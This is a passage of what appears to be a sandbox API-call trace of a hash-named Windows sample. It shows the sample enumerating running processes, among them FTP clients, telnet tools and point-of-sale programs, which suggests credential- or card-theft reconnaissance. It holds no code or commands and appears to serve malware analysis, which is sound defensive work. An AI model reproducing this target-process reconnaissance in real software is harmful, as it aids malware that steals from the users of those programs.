lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0108.765] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0108.767] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0108.768] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0108.769] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0108.770] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0108.770] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0108.771] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0108.772] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0108.773] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0108.776] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.777] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0108.778] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0108.779] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.780] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.781] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 1 [0108.782] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.783] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0108.784] CloseHandle (hObject=0x358) returned 1 [0108.784] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0108.784] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a1428 [0108.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0108.791] Process32First (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.791] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.792] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.793] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.794] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.795] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.796] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.797] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.798] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.798] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.799] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.800] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.801] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.802] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.802] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.803] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.804] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.805] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.806] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.807] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.807] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0108.808] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.809] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.810] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0108.814] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.815] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0108.815] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0108.816] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0108.817] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0108.818] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0108.819] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0108.820] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.821] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0108.821] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0108.822] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.823] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0108.824] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0108.825] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.826] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.828] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.829] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationmorningby.exe")) returned 1 [0108.829] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="daughter indeed.exe")) returned 1 [0108.830] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="generationtop.exe")) returned 1 [0108.831] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="riseleadnice.exe")) returned 1 [0108.832] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="him.exe")) returned 1 [0108.833] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="effort_network.exe")) returned 1 [0108.833] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="eighteye.exe")) returned 1 [0108.834] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice_million.exe")) returned 1 [0108.835] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young.exe")) returned 1 [0108.836] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x808, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="avoid_figure.exe")) returned 1 [0108.837] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge.exe")) returned 1 [0108.838] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="behaviorreligious.exe")) returned 1 [0108.839] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gun_single_most.exe")) returned 1 [0108.839] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="set.exe")) returned 1 [0108.840] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="exactly.exe")) returned 1 [0108.841] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="dreamentireprice.exe")) returned 1 [0108.842] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="their.exe")) returned 1 [0108.843] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x614, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operationblack.exe")) returned 1 [0108.844] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0108.845] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x704, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0108.846] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="determine.exe")) returned 1 [0108.848] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="production-learn.exe")) returned 1 [0108.850] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0108.866] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0108.868] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0108.869] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0108.870] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0108.872] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, 